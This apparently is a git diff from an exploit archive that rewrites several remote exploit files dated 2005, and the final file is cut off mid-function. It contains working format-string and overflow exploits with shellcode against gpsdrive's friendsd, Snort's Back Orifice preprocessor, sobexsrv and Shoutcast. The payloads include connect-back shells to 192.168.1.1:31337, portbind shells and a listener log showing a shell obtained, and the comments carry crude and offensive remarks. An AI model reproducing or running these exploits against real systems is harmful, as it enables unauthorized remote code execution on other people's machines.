+# +# IIIIIIIIII +# I::::::::I +# I::::::::I +# II::::::II +# I::::I +# I::::I ## ## ####### ######## ## ## +# I::::I ## ## ## ## ## ## #### +# EEEEEEEEEEEEEEEEEEEEEE I::::I ## ## ## ## ######## ## +# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## +# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## +# EE::::::EEEEEEEEE::::E I::::I ### ####### ## ## ## +# E:::::E EEEEEE I::::I +# E:::::E II::::::II +# E::::::EEEEEEEEEE I::::::::I +# E:::::::::::::::E and I::::::::I +# E:::::::::::::::E IIIIIIIIII +# E::::::EEEEEEEEEE ######## ####### ## ## ## ## +# E:::::E ## ## ## ## ### ## ## ## +# E:::::E EEEEEE ## ## ## ## #### ## #### +# EE::::::EEEEEEEE:::::E ######## ## ## ## ## ## ## +# E::::::::::::::::::::E ## ## ## ## ## #### ## +# E::::::::::::::::::::E ## ## ## ## ## ### ## +# EEEEEEEEEEEEEEEEEEEEEE ######## ####### ## ## ## +# (Kickin you all up in your grill piece since the early 90's) +# +# friendsd.c:367: fprintf (stderr, txt); +# +# Tested against: gpsdrive_2.09-2_powerpc.deb +# +# Crash the program and go to frame 2 +# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 +# (gdb) bt +# #0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 +# #1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6 +# #2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6 +# #3 0x100024b8 in dg_echo () +# #4 0x10002f28 in main () +# +# Grab the address of Arglist for frame 2 and overwrite that +4 +# (gdb) i f +# Stack level 2, frame at 0x7fffad70: +# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8 +# called by frame at 0x7fffae00, caller of frame at 0x7fff8700 +# Arglist at 0x7fffad70, args: +# Locals at 0x7fffad70, Previous frame's sp in r1 +# +# (gdb) x/a 0x7fffad70+4 +# 0x7fffad74: 0xf6825d0 (overwrite this) +# +# animosity:/home/kfinisterre# nc -l -p 31337 -vvv +# listening on [any] 31337 ... 
+# 192.168.1.1: inverse host lookup failed: Unknown host +# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349 +# id; +# uid=1000(kfinisterre) gid=1000(kfinisterre) +# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre) +# uname -a; +# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux +# +# This is NOT reliable or robust... Find your own damn pointers to overwrite + +use Net::Friends; +use Data::Dumper; + +$shellcode = +"\x69\x69\x69\x69" . +# /* connect-core5.c by Charles Stevenson */ +"\x7c\x3f\x0b\x78" . #/*mr r31,r1*/ +"\x3b\x40\x01\x0e" . #/*li r26,270*/ +"\x3b\x5a\xfe\xf4" . #/*addi r26,r26,-268*/ +"\x7f\x43\xd3\x78" . #/*mr r3,r26*/ +"\x3b\x60\x01\x0d" . #/*li r27,269*/ +"\x3b\x7b\xfe\xf4" . #/*addi r27,r27,-268*/ +"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ +"\x7c\xa5\x2a\x78" . #/*xor r5,r5,r5*/ +"\x7c\x3c\x0b\x78" . #/*mr r28,r1*/ +"\x3b\x9c\x01\x0c" . #/*addi r28,r28,268*/ +"\x90\x7c\xff\x08" . #/*stw r3,-248(r28)*/ +"\x90\x9c\xff\x0c" . #/*stw r4,-244(r28)*/ +"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ +"\x7f\x63\xdb\x78" . #/*mr r3,r27*/ +"\x3b\xdf\x01\x0c" . #/*addi r30,r31,268*/ +"\x38\x9e\xff\x08" . #/*addi r4,r30,-248*/ +"\x3b\x20\x01\x98" . #/*li r25,408*/ +"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"\x7c\x78\x1b\x78" . #/*mr r24,r3*/ +"\xb3\x5e\xff\x16" . #/*sth r26,-234(r30)*/ +"\x7f\xbd\xea\x78" . #/*xor r29,r29,r29*/ +#// Craft your exploit to poke these value in. Right now it's set +#// for port 31337 and ip 192.168.1.1. Here's an example +#// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 +#// 0xc0a8 +#// 0x0101 +"\x63\xbd" . # /* PORT # */ +"\x7a\x69" . #/*ori r29,r29,31337*/ +"\xb3\xbe\xff\x18" . #/*sth r29,-232(r30)*/ +"\x3f\xa0" . # /*IP(A.B) */ +#"\x42\x07" . # wtf is this? +"\xc0\xa8" . # /*lis r29,-16216*/ +"\x63\xbd" . # /*IP(C.D) */ +#"\xa1\x39" . # wtf is this? +"\x01\x01" . 
# /*ori r29,r29,257*/ +"\x93\xbe\xff\x1a" . #/*stw r29,-230(r30)*/ +"\x93\x1c\xff\x08" . #/*stw r24,-248(r28)*/ +"\x3a\xde\xff\x16" . #/*addi r22,r30,-234*/ +"\x92\xdc\xff\x0c" . #/*stw r22,-244(r28)*/ +"\x3b\xa0\x01\x1c" . #/*li r29,284*/ +"\x38\xbd\xfe\xf4" . #/*addi r5,r29,-268*/ +"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ +"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ +"\x7c\x7a\xda\x14" . #/*add r3,r26,r27*/ +"\x38\x9c\xff\x08" . #/*addi r4,r28,-248*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ +"\x7c\x84\x22\x78" . #/*xor r4,r4,r4*/ +"\x3a\xe0\x01\xf8" . #/*li r23,504*/ +"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ +"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ +"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +#// comment out the next 4 lines to save 16 bytes and lose stderr +#//"\x7f\x03\xc3\x78" /*mr r3,r24*/ +#//"\x7f\x44\xd3\x78" /*mr r4,r26*/ +#//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +#//"\x44\xde\xad\xf2" /*.long0x44deadf2*/ +"\x7c\xa5\x2a\x79" . #/*xor. r5,r5,r5*/ +"\x42\x40\xff\x35" . #/*bdzl+ 10000454
*/ +"\x7f\x08\x02\xa6" . #/*mflr r24*/ +"\x3b\x18\x01\x34" . #/*addi r24,r24,308*/ +"\x98\xb8\xfe\xfb" . #/*stb r5,-261(r24)*/ /* KF / Core / Ghandi mojo */ +"\x38\x78\xfe\xf4" . #/*addi r3,r24,-268*/ +"\x90\x61\xff\xf8" . #/*stw r3,-8(r1)*/ +"\x38\x81\xff\xf8" . #/*addi r4,r1,-8*/ +"\x90\xa1\xff\xfc" . #/*stw r5,-4(r1)*/ +"\x3b\xc0\x01\x60" . #/*li r30,352*/ +"\x7f\xc0\x2e\x70" . #/*srawi r0,r30,5*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"/bin/shZ"; # /* Z will become NULL */ + +$name = 'aaaaaaaa-aaaa'; + +$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb) +$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. + +$addy = pack('l', $writeaddr); +$addy2 = pack('l', $writeaddr+2); + +#$instr = 0x7fffae84; # Shellcode (inside gdb) +$instr = 0x7fffaea4; # Shellcode (outside gdb) + +$lo = ($instr >> 0) & 0xffff; +$hi = ($instr >> 16) & 0xffff; + +$hi = $hi - 0x4e; +$lo = (0x10000 + $lo) - $hi - 0x50; + +#$hi = 1; $lo =1; + +$dir = "$addy$addy2|%." . $hi . "d|%28\$hn|%." . $lo . "d|%29\$hn$shellcode"; + +$friends = Net::Friends->new(shift || 'localhost'); +$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); +print Dumper($friends->query); + +# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! + +# milw0rm.com [2005-11-04] diff --git a/platforms/linux/remote/1291.pl b/platforms/linux/remote/1291.pl index 89760174b..ffbba0d79 100755 --- a/platforms/linux/remote/1291.pl +++ b/platforms/linux/remote/1291.pl 
@@ -1,111 +1,111 @@ -#!/usr/bin/perl -w -# -# Code by KF, although it is most likely ripped from John H. -# (kf_lists[at]digital_munition[dot]com) -# -# http://www.digitalmunition.com -# -# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. -# Free 14 day Testicle licking trial available! -# -# friendsd.c:367: fprintf (stderr, txt); -# -# Tested on intel using gpsdrive_2.09-2_i386.deb -# -# kfinisterre@animosity:~$ telnet localhost 5074 -# Trying 127.0.0.1... -# Connected to animosity -# Escape character is '^]'. -# id; -# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre) -# : command not found -# -# s0t4ipv6@Shellcode.com.ar -# x86 portbind a shell in port 5074 -# 92 bytes. -# -# This shit is NOT robust and most likely will NOT work on kernel 2.6.12 -# because of the random address space. Find your own damn pointers to overwrite -# -$shellcode = "\x90" x 2 . -"\x31\xc0" . # xorl %eax,%eax -"\x50" . # pushl %eax -"\x40" . # incl %eax -"\x89\xc3" . # movl %eax,%ebx -"\x50" . # pushl %eax -"\x40" . # incl %eax -"\x50" . # pushl %eax -"\x89\xe1" . # movl %esp,%ecx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x31\xd2" . # xorl %edx,%edx -"\x52" . # pushl %edx -"\x66\x68\x13\xd2" . # pushw $0xd213 -"\x43" . # incl %ebx -"\x66\x53" . # pushw %bx -"\x89\xe1" . # movl %esp,%ecx -"\x6a\x10" . # pushl $0x10 -"\x51" . # pushl %ecx -"\x50" . # pushl %eax -"\x89\xe1" . # movl %esp,%ecx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x40" . # incl %eax -"\x89\x44\x24\x04" . # movl %eax,0x4(%esp,1) -"\x43" . # incl %ebx -"\x43" . # incl %ebx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x83\xc4\x0c" . # addl $0xc,%esp -"\x52" . # pushl %edx -"\x52" . # pushl %edx -"\x43" . # incl %ebx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x93" . # xchgl %eax,%ebx -"\x89\xd1" . # movl %edx,%ecx -"\xb0\x3f" . # movb $0x3f,%al -"\xcd\x80" . # int $0x80 -"\x41" . # incl %ecx -"\x80\xf9\x03" . 
# cmpb $0x3,%cl -"\x75\xf6" . # jnz -"\x52" . # pushl %edx -"\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e -"\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f -"\x89\xe3" . # movl %esp,%ebx -"\x52" . # pushl %edx -"\x53" . # pushl %ebx -"\x89\xe1" . # movl %esp,%ecx -"\xb0\x0b" . # movb $0xb,%al -"\xcd\x80"; # int $0x80 - -use Net::Friends; -use Data::Dumper; - -$name = 'GPSDRIVE-aaaa'; - -# 0804bb84 R_386_JUMP_SLOT recvfrom -$addy = "\x86\xbb\x04\x08"; # This is the write address. -$addy2 = "\x84\xbb\x04\x08"; - -#$retaddr = 0xbfffba7c; # Retaddr when using gdb -$retaddr = 0xbfffba8a; # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit. - -$lo = ($retaddr >> 0) & 0xffff; -$hi = ($retaddr >> 16) & 0xffff; - -$hi = $hi - 0x4c; -$lo = (0x10000 + $lo) - $hi - 0x4c; - -$hi =1; $lo =1; - -$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode"; - -$friends = Net::Friends->new(shift || 'localhost'); -$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); - -print Dumper($friends->query); - -# P.S. - I fart in the general direction of Fr-Sirt. - -# milw0rm.com [2005-11-04] +#!/usr/bin/perl -w +# +# Code by KF, although it is most likely ripped from John H. +# (kf_lists[at]digital_munition[dot]com) +# +# http://www.digitalmunition.com +# +# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. +# Free 14 day Testicle licking trial available! +# +# friendsd.c:367: fprintf (stderr, txt); +# +# Tested on intel using gpsdrive_2.09-2_i386.deb +# +# kfinisterre@animosity:~$ telnet localhost 5074 +# Trying 127.0.0.1... +# Connected to animosity +# Escape character is '^]'. +# id; +# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre) +# : command not found +# +# s0t4ipv6@Shellcode.com.ar +# x86 portbind a shell in port 5074 +# 92 bytes. +# +# This shit is NOT robust and most likely will NOT work on kernel 2.6.12 +# because of the random address space. 
Find your own damn pointers to overwrite +# +$shellcode = "\x90" x 2 . +"\x31\xc0" . # xorl %eax,%eax +"\x50" . # pushl %eax +"\x40" . # incl %eax +"\x89\xc3" . # movl %eax,%ebx +"\x50" . # pushl %eax +"\x40" . # incl %eax +"\x50" . # pushl %eax +"\x89\xe1" . # movl %esp,%ecx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x31\xd2" . # xorl %edx,%edx +"\x52" . # pushl %edx +"\x66\x68\x13\xd2" . # pushw $0xd213 +"\x43" . # incl %ebx +"\x66\x53" . # pushw %bx +"\x89\xe1" . # movl %esp,%ecx +"\x6a\x10" . # pushl $0x10 +"\x51" . # pushl %ecx +"\x50" . # pushl %eax +"\x89\xe1" . # movl %esp,%ecx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x40" . # incl %eax +"\x89\x44\x24\x04" . # movl %eax,0x4(%esp,1) +"\x43" . # incl %ebx +"\x43" . # incl %ebx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x83\xc4\x0c" . # addl $0xc,%esp +"\x52" . # pushl %edx +"\x52" . # pushl %edx +"\x43" . # incl %ebx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x93" . # xchgl %eax,%ebx +"\x89\xd1" . # movl %edx,%ecx +"\xb0\x3f" . # movb $0x3f,%al +"\xcd\x80" . # int $0x80 +"\x41" . # incl %ecx +"\x80\xf9\x03" . # cmpb $0x3,%cl +"\x75\xf6" . # jnz +"\x52" . # pushl %edx +"\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e +"\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f +"\x89\xe3" . # movl %esp,%ebx +"\x52" . # pushl %edx +"\x53" . # pushl %ebx +"\x89\xe1" . # movl %esp,%ecx +"\xb0\x0b" . # movb $0xb,%al +"\xcd\x80"; # int $0x80 + +use Net::Friends; +use Data::Dumper; + +$name = 'GPSDRIVE-aaaa'; + +# 0804bb84 R_386_JUMP_SLOT recvfrom +$addy = "\x86\xbb\x04\x08"; # This is the write address. +$addy2 = "\x84\xbb\x04\x08"; + +#$retaddr = 0xbfffba7c; # Retaddr when using gdb +$retaddr = 0xbfffba8a; # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit. 
+ +$lo = ($retaddr >> 0) & 0xffff; +$hi = ($retaddr >> 16) & 0xffff; + +$hi = $hi - 0x4c; +$lo = (0x10000 + $lo) - $hi - 0x4c; + +$hi =1; $lo =1; + +$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode"; + +$friends = Net::Friends->new(shift || 'localhost'); +$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); + +print Dumper($friends->query); + +# P.S. - I fart in the general direction of Fr-Sirt. + +# milw0rm.com [2005-11-04] diff --git a/platforms/linux/remote/1314.rb b/platforms/linux/remote/1314.rb index f00ce9b7f..8f35ea4ba 100755 --- a/platforms/linux/remote/1314.rb +++ b/platforms/linux/remote/1314.rb 
@@ -1,85 +1,85 @@ -#!/usr/bin/ruby -w - -# -# -# Version 0.1 (Public) -# -# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit -# -# by xwings at mysec dot org -# URL : http://www.mysec.org , somebody need to update the page -# -# Saying Hi to .... -# -# . All the 1337 c0d3r @ pulltheplug.org -# . Gurus from #rubylang @ freenode.net -# . Skywizard @ somewhere right now -# . HITBSecConf CREW and Team Panda -# -# 03:07 <@mark> hey xwings -# 03:07 <@mark> why don't you come up and see me sometime? -# -# Tested on : -# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux -# gcc version 3.3.5 (Debian 1:3.3.5-13) -# Snort 2.4.2 , ./configure && make && make install -# -# Use Ruby : http://www.ruby-lang.org -# -# -# - -require 'socket' - -fathost = ARGV[0] -packetsize = 1069 # ret is 1069 -targetport = 9080 - -boheader = "*!*QWTY?" + - [1096].pack("V") + # Length ,thanx Russell Sanford - "\xed\xac\xef\x0d"+ # ID - "\x01" # PING - -## Port Bind 3964 . connectback, refer to Russell Sanford's code - -shellcode = "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"+ - "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"+ - "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"+ - "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"+ - "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"+ - "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"+ - "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81" - -filler = "\x90" * (packetsize-(boheader.length + shellcode.length)) - -retadd = [0xbffff370].pack('L') - - -darthcode = (shellcode+filler+retadd) - -def msrand(seed) - @holdrand = 31337 - end - -def mrand() - return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff) - end - -def bocrypt(takepayload) - - @arrpayload = (takepayload.split(//)) - - encpayload ="".to_s - @holdrand=0 - msrand(0) - - @arrpayload.each do |c| - encpayload 
+=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr - end - - return encpayload - end - -UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport) - -# milw0rm.com [2005-11-11] +#!/usr/bin/ruby -w + +# +# +# Version 0.1 (Public) +# +# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit +# +# by xwings at mysec dot org +# URL : http://www.mysec.org , somebody need to update the page +# +# Saying Hi to .... +# +# . All the 1337 c0d3r @ pulltheplug.org +# . Gurus from #rubylang @ freenode.net +# . Skywizard @ somewhere right now +# . HITBSecConf CREW and Team Panda +# +# 03:07 <@mark> hey xwings +# 03:07 <@mark> why don't you come up and see me sometime? +# +# Tested on : +# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux +# gcc version 3.3.5 (Debian 1:3.3.5-13) +# Snort 2.4.2 , ./configure && make && make install +# +# Use Ruby : http://www.ruby-lang.org +# +# +# + +require 'socket' + +fathost = ARGV[0] +packetsize = 1069 # ret is 1069 +targetport = 9080 + +boheader = "*!*QWTY?" + + [1096].pack("V") + # Length ,thanx Russell Sanford + "\xed\xac\xef\x0d"+ # ID + "\x01" # PING + +## Port Bind 3964 . 
connectback, refer to Russell Sanford's code + +shellcode = "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"+ + "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"+ + "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"+ + "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"+ + "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"+ + "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"+ + "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81" + +filler = "\x90" * (packetsize-(boheader.length + shellcode.length)) + +retadd = [0xbffff370].pack('L') + + +darthcode = (shellcode+filler+retadd) + +def msrand(seed) + @holdrand = 31337 + end + +def mrand() + return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff) + end + +def bocrypt(takepayload) + + @arrpayload = (takepayload.split(//)) + + encpayload ="".to_s + @holdrand=0 + msrand(0) + + @arrpayload.each do |c| + encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr + end + + return encpayload + end + +UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport) + +# milw0rm.com [2005-11-11] diff --git a/platforms/linux/remote/1355.pl b/platforms/linux/remote/1355.pl index d29bf4b01..d54bd6869 100755 --- a/platforms/linux/remote/1355.pl +++ b/platforms/linux/remote/1355.pl 
@@ -1,48 +1,48 @@ -#!/usr/bin/perl -# -# trifinite.group Bluetooth sobexsrv remote syslog() exploit -# code by kf_lists[at]digitalmunition[dot]com -# -# http://www.digitalmunition.com -# -# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude! -# Big ups to d4yj4y beeeeeeeeeeeeeotch! -# -$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. - -# R_386_JUMP_SLOT exit() -$addy = "\x5a\x19\x05\x08"; -$addy2 = "\x58\x19\x05\x08"; - -$lo = ($retloc >> 0) & 0xffff; -$hi = ($retloc >> 16) & 0xffff; - -$hi = $hi - 0x38; -$lo = (0x10000 + $lo) - $hi - 0x38; - -#print "hi: $hi\n"; -#print "lo: $lo\n"; - -$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200; -#print $string . "\n"; - -$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35". -"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e". -"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56". -"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30". -"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56". -"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35". -"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a"; - -open(F, "> /tmp/shellcode") or die "can't open file"; -print F "$sc\n"; -close(F); - -system($string); - -# milw0rm.com [2005-12-03] +#!/usr/bin/perl +# +# trifinite.group Bluetooth sobexsrv remote syslog() exploit +# code by kf_lists[at]digitalmunition[dot]com +# +# http://www.digitalmunition.com +# +# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude! 
+# Big ups to d4yj4y beeeeeeeeeeeeeotch! +# +$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. + +# R_386_JUMP_SLOT exit() +$addy = "\x5a\x19\x05\x08"; +$addy2 = "\x58\x19\x05\x08"; + +$lo = ($retloc >> 0) & 0xffff; +$hi = ($retloc >> 16) & 0xffff; + +$hi = $hi - 0x38; +$lo = (0x10000 + $lo) - $hi - 0x38; + +#print "hi: $hi\n"; +#print "lo: $lo\n"; + +$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200; +#print $string . "\n"; + +$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35". +"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e". +"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56". +"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30". +"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56". +"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35". +"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a"; + +open(F, "> /tmp/shellcode") or die "can't open file"; +print F "$sc\n"; +close(F); + +system($string); + +# milw0rm.com [2005-12-03] diff --git a/platforms/linux/remote/1456.c b/platforms/linux/remote/1456.c index b390ee488..4e71337c5 100755 --- a/platforms/linux/remote/1456.c +++ b/platforms/linux/remote/1456.c 
@@ -1,369 +1,369 @@ -/* - * Shoutcast <= 1.9.4 exploit by crash-x - * Trys to upload the shellcode to a fixed address - * and execute it. - * - * This exploit was _not_ written bei Simon 'Zodiac' Moser (segfault.ch). - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SHELL_PORT 7000 -#define SHELL_COMMAND "unset HISTFILE; uname -a; id;" - - -#if 1 -unsigned char shellcode[] = /* bindshell (7000) (Unknown) */ - "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" - "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" - "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" - "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" - "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" - "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" - "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" - "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; -#endif - - -struct targ{ - char *platform; - int retloc; - int retaddr; - int dpa_offset; - -} targets[]= { - { "Try to determine target", 0xdeadbabe, 0xdeadbabe, 123 }, - { "Shoutcast 1.9.4 all Linux distros", 0x0806493c, 0xdeadbabe, 2534 }, // dpa offset stolen from coki and tal0n's exploit - { "Shoutcast 1.9.2 all Linux distros", 0x0806c270, 0xdeadbabe, 2536 }, - { NULL } -}; - - -void usage(char *a){ - int i; - - printf("[-] Usage: %s -h [options]\n", a); - printf("[!] Options:\n"); - printf("\t\t-h\tHostname you want attack (required)\n"); - printf("\t\t-p\tPort of the shoutcast (default: 8000)\n"); - printf("\t\t-t\tTarget (default: 0)\n"); - printf("\t\t-s\tHow long to sleep before try connect to shell in s (default: 1)\n"); - printf("\t\t-S\tHow long to sleep before write the next byte of shellcode to the memory in ms (default: 7)\n"); - printf("[!] 
Targets:\n"); - for(i = 0; targets[i].platform; i++) - printf("\t\t%d\t %s\n", i, targets[i].platform); - exit(1); -} - - -int sockprintf(int sock, const char *s, ...){ - char *ptr; - int bytes; - va_list arg; - va_start(arg, s); - if(vasprintf(&ptr, s, arg) == -1){ -/* free(ptr); do'h shame on me */ - return -1; - } - va_end(arg); - - bytes = send(sock, ptr, strlen(ptr), 0); - free(ptr); - return bytes; -} - - -int resolv(struct sockaddr_in *addr, char *hostn){ - struct hostent *host; - - if (!inet_aton(hostn, &addr->sin_addr)){ - host = gethostbyname(hostn); - if (host == NULL){ - printf("[-] Wasnt able to resolve %s!\n", hostn); - return -1; - } - addr->sin_addr = *(struct in_addr*)host->h_addr; - } - return 0; -} - - -int conn(struct sockaddr_in addr, int port){ - int sock; - - if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){ - return -1; - } - - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - - if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){ - return -1; - } - return sock; -} - - -int get_shell(struct sockaddr_in addr, int port, int sleeps){ - int sock; - char buffer[1024]; - fd_set fds; - - signal(SIGINT, SIG_IGN); - - sleep(sleeps); - - if((sock = 